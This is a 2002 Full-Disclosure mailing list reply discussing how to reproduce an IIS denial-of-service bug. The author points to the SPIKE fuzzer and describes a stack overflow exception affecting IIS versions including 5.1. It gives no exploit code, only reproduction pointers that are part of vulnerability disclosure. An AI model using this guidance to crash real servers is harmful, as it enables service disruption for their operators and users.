Re: [Full-Disclosure] How to reproduce the IIS Host Header DOS

From: Full Disclosure (full-disclosureat_private)
Date: Sat Oct 12 2002 - 12:55:51 PDT

    Heh. I thought my screenshot DID show exactly how to reproduce the bug:
    You run SPIKE! :> You can download SPIKE 2.7 at
    http://www.immunitysec.com/spike.html - it's the exact version I used in
    the demonstration screenshot.

    You should read my actual commentary on the bug. The bug is actually IIS
    servicing a stack overflow exception, and is not limited to
    /_vti_bin/shtml.dll or any other particular file or directory. It also
    affects IIS 5.1. It's not limited to the Host: field, as far as I can
    tell. Any "stack overflow" exception will trigger this behavior.

    Dave Aitel
    Immunity, Inc.

    On Fri, 2002-10-11 at 19:26, Joe Testa wrote:

    > (See attached file: iis_dos)

    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html